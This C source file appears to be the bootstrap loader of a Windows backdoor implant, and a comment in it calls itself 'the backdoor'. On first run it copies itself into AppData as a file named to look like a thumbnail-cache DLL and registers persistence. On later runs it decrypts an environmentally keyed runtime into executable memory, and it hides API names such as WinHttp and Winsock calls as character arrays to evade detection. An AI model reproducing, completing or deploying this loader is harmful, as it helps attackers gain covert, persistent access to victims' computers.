#include <Windows.h>
#include <Psapi.h>

#include "Main.h"
#include "..\common\allocators.h"
#include "bin_patch.h"
#include "winapi_utils.h"


/* external projects */
#include "..\EnvironmentalKeying\EnvironmentalKeying.h"
#include "..\Persistence\\Persistence.h"
#include "..\Runtime\Runtime.h"

#include "..\common\debug.h"
//#include "vld.h"

#include <stdio.h>


typedef struct _RUNTIME_MAIN_PARAMS
{
	PRUNTIME* pRuntime;
	PBINPATCH_STRUCT pBinPatch;
	int argc;
	char **argv;
	RUNTIME_MAIN fpRuntimeMain;
	HANDLE hDllToFree;
}RUNTIME_MAIN_PARAMS, *PRUNTIME_MAIN_PARAMS;

DWORD WINAPI ThreadLess(LPVOID lpParam);

#ifdef _EXESTANDALONE
int main(int argc, char** argv)
{
	
	OUTPUTDEBUG("[*] Main\n");
	
	//CHAR szProcessModulePath[MAX_PATH];
	//ZeroMemory(szProcessModulePath, sizeof(szProcessModulePath));
	//HANDLE hProcess = GetCurrentProcess();	
	//DWORD dwRet = GetModuleBaseName(hProcess, NULL, szProcessModulePath, MAX_PATH - 1);
	//OutputDebug(szProcessModulePath);
	//CloseHandle(hProcess);

	DWORD dwThreadId;
	HANDLE hThread = CreateThread(NULL, 0, Bootstrap, NULL, 0, &dwThreadId);

	OUTPUTDEBUG("[*] Spawned thread id %d\n", dwThreadId);
	WaitForSingleObject(hThread, INFINITE);
	OUTPUTDEBUG("[*] Bailing\n");

	return 0;
}
#endif

DWORD WINAPI Bootstrap(LPVOID lpParam)
{
	
	OUTPUTDEBUG("[*] made it\n");
	

	/*	upon first run:
		a] dump the loader 
		b] point the persistence to the new loader copy
		c] encrypt the non loader modules 
	*/
	if (pFirstRun.dwFirstRunValue)
	{
		CHAR szProcessModulePath[MAX_PATH];
		ZeroMemory(szProcessModulePath, sizeof(szProcessModulePath));
		GetModuleFileName(NULL, szProcessModulePath, MAX_PATH);
		HANDLE hThisFile = CreateFile(szProcessModulePath, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if (hThisFile != INVALID_HANDLE_VALUE)
		{
			/* read the current PE, patch the first run flag and dump the loader */
			DWORD dwFileSize = GetFileSize(hThisFile, NULL);

			LPVOID lpLoaderBuffer = (LPVOID)salloc(dwFileSize);

			DWORD dwBytesRead = 0;
			ReadFile(hThisFile, lpLoaderBuffer, dwFileSize, &dwBytesRead, NULL);

			PatchDword(lpLoaderBuffer, dwBytesRead, FLAG_HIGH32 | FLAG_FIRST_RUN, 0x0);

			CHAR *szLoaderRelativePath = "\\Microsoft\\Windows\\Explorer\\thumbcache_sdr_stream.dll";
			CHAR *szAppDataLocal = GetLocalAppData();
			CHAR szLoaderFullPath[MAX_PATH];
			_snprintf_s(szLoaderFullPath, MAX_PATH, _TRUNCATE, "%s%s", szAppDataLocal, szLoaderRelativePath);

			HANDLE hLoader = CreateFile(szLoaderFullPath, GENERIC_WRITE, 0, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

			if (hLoader != INVALID_HANDLE_VALUE)
			{
				/* a]  dump the loader  */
				DWORD dwBytesWritten = 0;
				WriteFile(hLoader, lpLoaderBuffer, dwBytesRead, &dwBytesWritten, 0);
				CloseHandle(hLoader);

				OUTPUTDEBUG("[*] First run, patching %s and dumping into %s\n", szProcessModulePath, szLoaderFullPath);


				/* b] point the persistence to the new loader copy */
				Set64bitDllPersistence(szLoaderFullPath);

				/* c] encrypt the non loader modules */
			}
			
			/* cleanup */
			sfree(szAppDataLocal);
			sfree(lpLoaderBuffer);
			CloseHandle(hThisFile);
			
		}
	} //if (pFirstRun.dwFirstRunValue)

	/*	after the first run:
		a] load runtime with EnvironmentalKeying
		c] load and register modules with EnvironmentalKeying
	*/
	else
	{
		/* a] */
		ENVIRONMENTAL_KEYING_ITEM runtimeKeyingConf;
		runtimeKeyingConf.encryptedItemPath = "C:\\Users\\unknown\\stuff\\Lotus\\64bit\\Actproxy\\x64\\ExeStandaloneDebug\\HomeUserEncryptedRuntime.sc";
		runtimeKeyingConf.key = GetUserHomeDirectory();

		unsigned char homeExpectedValue[32] = {
			0x4F, 0x94, 0x07, 0xAD, 0x10, 0xE4, 0xC7, 0x18, 0x2A, 0xA1, 0x73, 0x05, 0x39, 0x8F, 0x55, 0x6E,
			0xCC, 0x36, 0x21, 0x3E, 0x03, 0x13, 0x8D, 0xB7, 0x56, 0x2D, 0x24, 0x14, 0x08, 0x14, 0xEC, 0xC3
		};

		memcpy(runtimeKeyingConf.expectedValue, homeExpectedValue, 32);
				
		
		HANDLE hFile = CreateFile(runtimeKeyingConf.encryptedItemPath, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
		DWORD dwFileSize = GetFileSize(hFile, NULL);
		LPVOID lpEncrpytedRuntime = (LPVOID)VirtualAlloc(NULL, dwFileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		DWORD dwBytesRead = 0;
		ReadFile(hFile, lpEncrpytedRuntime, dwFileSize, &dwBytesRead, NULL);
		CloseHandle(hFile);

		BOOL bSetupSuccessful = EnvironmentalKeyingSetup(runtimeKeyingConf.key, &runtimeKeyingConf.expectedValue);

		if (!bSetupSuccessful)
		{
			OUTPUTDEBUG("[E] issues with EnvironmentalKeyingSetup");
		}

		LPVOID lpDecryptedRuntime = (LPVOID)VirtualAlloc(NULL, dwBytesRead, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		BOOL bRuntimeDecryptionSuccessful = EnvironmentalKeyingDecrypt(lpEncrpytedRuntime, dwBytesRead, lpDecryptedRuntime);

		if (!bRuntimeDecryptionSuccessful)
		{
			OUTPUTDEBUG("[E] issues with EnvironmentalKeyingDecryption");
		}

		RUNTIME_INIT  fpRuntimeInit = ResolveRuntimeExport(lpDecryptedRuntime, dwBytesRead, RUNTIME_INIT_WRAPPER_EXPORT);
		RUNTIME_CLOSE fpRuntimeClose = ResolveRuntimeExport(lpDecryptedRuntime, dwBytesRead, RUNTIME_CLOSE_WRAPPER_EXPORT);
		RUNTIME_MAIN fpRuntimeMain = ResolveRuntimeExport(lpDecryptedRuntime, dwBytesRead, RUNTIME_MAIN_WRAPPER_EXPORT);

		OUTPUTDEBUG("[*] resolved RuntimeInit %p\n", fpRuntimeInit);
		OUTPUTDEBUG("[*] resolved RuntimeClose %p\n", fpRuntimeClose);

		DYNAMIC_LOADER_STRINGS moduleLoaderStrings =
		{
			{ 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', 0x0 },
			{ 'C', 'l', 'o', 's', 'e', 'H', 'a', 'n', 'd', 'l', 'e', 0x0 },
			{ 'E', 'x', 'p', 'a', 'n', 'd', 'E', 'n', 'v', 'i', 'r', 'o', 'n', 'm', 'e', 'n', 't', 'S', 't', 'r', 'i', 'n', 'g', 's', 'A', 0x0 },
			{ 'F', 'i', 'n', 'd', 'C', 'l', 'o', 's', 'e', 0x0 },
			{ 'F', 'i', 'n', 'd', 'F', 'i', 'r', 's', 't', 'F', 'i', 'l', 'e', 'A', 0x0 },
			{ 'F', 'i', 'n', 'd', 'N', 'e', 'x', 't', 'F', 'i', 'l', 'e', 'A', 0x0 },
			{ 'F', 'r', 'e', 'e', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 0x0 },
			{ 'G', 'e', 't', 'C', 'u', 'r', 'r', 'e', 'n', 't', 'P', 'r', 'o', 'c', 'e', 's', 's', 0x0 },
			{ 'G', 'e', 't', 'D', 'r', 'i', 'v', 'e', 'T', 'y', 'p', 'e', 'A', 0x0 },
			{ 'G', 'e', 't', 'E', 'n', 'v', 'i', 'r', 'o', 'n', 'm', 'e', 'n', 't', 'V', 'a', 'r', 'i', 'a', 'b', 'l', 'e', 'A', 0x0 },
			{ 'G', 'e', 't', 'E', 'n', 'v', 'i', 'r', 'o', 'n', 'm', 'e', 'n', 't', 'V', 'a', 'r', 'i', 'a', 'b', 'l', 'e', 'W', 0x0 },
			{ 'G', 'e', 't', 'L', 'a', 's', 't', 'E', 'r', 'r', 'o', 'r', 0x0 },
			{ 'G', 'e', 't', 'P', 'r', 'o', 'c', 'A', 'd', 'd', 'r', 'e', 's', 's', 0x0 },
			{ 'G', 'e', 't', 'S', 'y', 's', 't', 'e', 'm', 'T', 'i', 'm', 'e', 'A', 's', 'F', 'i', 'l', 'e', 'T', 'i', 'm', 'e', 0x0 },
			{ 'G', 'e', 't', 'T', 'i', 'c', 'k', 'C', 'o', 'u', 'n', 't', 0x0 },
			{ 'L', 'o', 'c', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 0x0 },
			{ 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', 0x0 },
			{ 'L', 'o', 'c', 'a', 'l', 'F', 'r', 'e', 'e', 0x0 },
			{ 'L', 'o', 'c', 'a', 'l', 'R', 'e', 'a', 'l', 'l', 'o', 'c', 0x0 },
			{ 'O', 'u', 't', 'p', 'u', 't', 'D', 'e', 'b', 'u', 'g', 'S', 't', 'r', 'i', 'n', 'g', 'A', 0x0 },
			{ 'S', 'l', 'e', 'e', 'p', 0x0 },
			{ 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 0x0 },
			{ 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 'E', 'x', 0x0 },
			{ 'V', 'i', 'r', 't', 'u', 'a', 'l', 'F', 'r', 'e', 'e', 0x0 },
			{ 'V', 'i', 'r', 't', 'u', 'a', 'l', 'P', 'r', 'o', 't', 'e', 'c', 't', 0x0 },
			{ 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', 0x0 },
			{ 'C', 'o', 'n', 'v', 'e', 'r', 't', 'S', 'i', 'd', 'T', 'o', 'S', 't', 'r', 'i', 'n', 'g', 'S', 'i', 'd', 'A', 0x0 },
			{ 'G', 'e', 't', 'T', 'o', 'k', 'e', 'n', 'I', 'n', 'f', 'o', 'r', 'm', 'a', 't', 'i', 'o', 'n', 0x0 },
			{ 'O', 'p', 'e', 'n', 'P', 'r', 'o', 'c', 'e', 's', 's', 'T', 'o', 'k', 'e', 'n', 0x0 },
			{ 'm', 's', 'v', 'c', 'r', 't', 0x0 },
			{ '_', 'i', 't', 'o', 'a', '_', 's', 0x0 },
			{ '_', 'i', 't', 'o', 'w', '_', 's', 0x0 },
			{ 'm', 'e', 'm', 'c', 'm', 'p', 0x0 },
			{ 'm', 'e', 'm', 'c', 'p', 'y', 0x0 },
			{ 'm', 'e', 'm', 'c', 'p', 'y', '_', 's', 0x0 },
			{ 'm', 'e', 'm', 's', 'e', 't', 0x0 },
			{ 'r', 'a', 'n', 'd', 0x0 },
			{ '_', 's', 'n', 'p', 'r', 'i', 'n', 't', 'f', '_', 's', 0x0 },
			{ 's', 'r', 'a', 'n', 'd', 0x0 },
			{ 's', 't', 'r', 'c', 'm', 'p', 0x0 },
			{ 's', 't', 'r', 'l', 'e', 'n', 0x0 },
			{ 's', 't', 'r', 'r', 'c', 'h', 'r', 0x0 },
			{ 's', 's', 'c', 'a', 'n', 'f', '_', 's', 0x0 },
			{ 's', 't', 'r', 'c', 'a', 't', '_', 's', 0x0 },
			{ 's', 't', 'r', 'c', 'h', 'r', 0x0 },
			{ 's', 'w', 'p', 'r', 'i', 'n', 't', 'f', '_', 's', 0x0 },
			{ 'w', 'c', 's', 'c', 'a', 't', '_', 's', 0x0 },
			{ 'w', 'c', 's', 'c', 'p', 'y', '_', 's', 0x0 },
			{ 'w', 'c', 's', 'l', 'e', 'n', 0x0 },
			{ '_', 'w', 't', 'o', 'i', 0x0 },
			{ 'W', 'i', 'n', 'h', 't', 't', 'p', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'C', 'l', 'o', 's', 'e', 'H', 'a', 'n', 'd', 'l', 'e', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'C', 'o', 'n', 'n', 'e', 'c', 't', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'G', 'e', 't', 'I', 'E', 'P', 'r', 'o', 'x', 'y', 'C', 'o', 'n', 'f', 'i', 'g', 'F', 'o', 'r', 'C', 'u', 'r', 'r', 'e', 'n', 't', 'U', 's', 'e', 'r', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'G', 'e', 't', 'P', 'r', 'o', 'x', 'y', 'F', 'o', 'r', 'U', 'r', 'l', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'O', 'p', 'e', 'n', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'O', 'p', 'e', 'n', 'R', 'e', 'q', 'u', 'e', 's', 't', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'Q', 'u', 'e', 'r', 'y', 'H', 'e', 'a', 'd', 'e', 'r', 's', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'R', 'e', 'a', 'd', 'D', 'a', 't', 'a', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'R', 'e', 'c', 'e', 'i', 'v', 'e', 'R', 'e', 's', 'p', 'o', 'n', 's', 'e', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'S', 'e', 'n', 'd', 'R', 'e', 'q', 'u', 'e', 's', 't', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'S', 'e', 't', 'O', 'p', 't', 'i', 'o', 'n', 0x0 },
			{ 'W', 'i', 'n', 'H', 't', 't', 'p', 'S', 'e', 't', 'T', 'i', 'm', 'e', 'o', 'u', 't', 's', 0x0 },
			{ 'W', 's', '2', '_', '3', '2', 0x0 },
			{ 'g', 'e', 't', 'h', 'o', 's', 't', 'b', 'y', 'n', 'a', 'm', 'e', 0x0 },
			{ 'i', 'n', 'e', 't', '_', 'a', 'd', 'd', 'r', 0x0 },
			{ 'i', 'n', 'e', 't', '_', 'n', 't', 'o', 'a', 0x0 },
			{ 'n', 't', 'o', 'h', 'l', 0x0 },
			{ 'W', 'S', 'A', 'C', 'l', 'e', 'a', 'n', 'u', 'p', 0x0 },
			{ 'W', 'S', 'A', 'S', 't', 'a', 'r', 't', 'u', 'p', 0x0 },
		};


		INIT_FUNCTIONPOINTERS init;
		init.fpGetProcAddress = GetProcAddress;
		init.fpLoadLibraryA = LoadLibraryA;
		init.fpLocalAlloc = LocalAlloc;
		init.fpLocalFree = LocalFree;

		PRUNTIME pRuntime = NULL;

		PDYNAMIC_LOADER_STRINGS pRuntimeStrings = (PDYNAMIC_LOADER_STRINGS)malloc(sizeof(DYNAMIC_LOADER_STRINGS));
		memcpy(pRuntimeStrings, &moduleLoaderStrings, sizeof(DYNAMIC_LOADER_STRINGS));

		PINIT_FUNCTIONPOINTERS pInit = (PINIT_FUNCTIONPOINTERS)malloc(sizeof(INIT_FUNCTIONPOINTERS));
		memcpy(pInit, &init, sizeof(INIT_FUNCTIONPOINTERS));

		fpRuntimeInit(&pRuntime, pRuntimeStrings, pInit);

		LPVOID lpTest = pRuntime->pKernel32->fpVirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		pRuntime->pKernel32->fpVirtualFree(lpTest, 0, MEM_RELEASE);

	/*	char **argv = (char**) malloc(sizeof(char*));
		*argv = "asdf\n";
		
		fpRuntimeMain(&pRuntime, NULL, 0, argv);*/

		char **argv2 = (char**)malloc(sizeof(char*));
		*argv2 = (char*)malloc(10);
		memcpy(*argv2, "main\n", 6);

		PRUNTIME_MAIN_PARAMS pParams = (PRUNTIME_MAIN_PARAMS)malloc(sizeof(RUNTIME_MAIN_PARAMS));
		pParams->pRuntime = &pRuntime;
		pParams->pBinPatch = (PBINPATCH_STRUCT)malloc(sizeof(BINPATCH_STRUCT));
		pParams->argc = 2000;
		pParams->argv = argv2;
		pParams->fpRuntimeMain = fpRuntimeMain;
		
		pParams->pBinPatch->hDllToFree= LoadLibraryA("C:\\Users\\unknown\\stuff\\Lotus\\64bit\\Actproxy\\x64\\DllDebug\\Actproxy.dll");
		
		DWORD dwThreadId = 0;
		HANDLE hThread = CreateThread(NULL, 0, ThreadLess, pParams, 0, &dwThreadId);

		OUTPUTDEBUG("[*] RuntimeMain thread id %d\n", dwThreadId);
		//WaitForSingleObject(hThread, INFINITE);
		//OUTPUTDEBUG("[*] RuntimeMain spawned out\n");

		//fpRuntimeMain(&pRuntime, NULL, 2000, argv2);

		//fpRuntimeClose(&pRuntime, &init);
	}

	/* after bootstrap toke place, run the backdoor*/


	return 0;
}


DWORD WINAPI ThreadLess(LPVOID lpParam)
{

	PRUNTIME_MAIN_PARAMS pParams = (PRUNTIME_MAIN_PARAMS)lpParam;

	pParams->fpRuntimeMain(pParams->pRuntime, pParams->pBinPatch, pParams->argc, pParams->argv);
}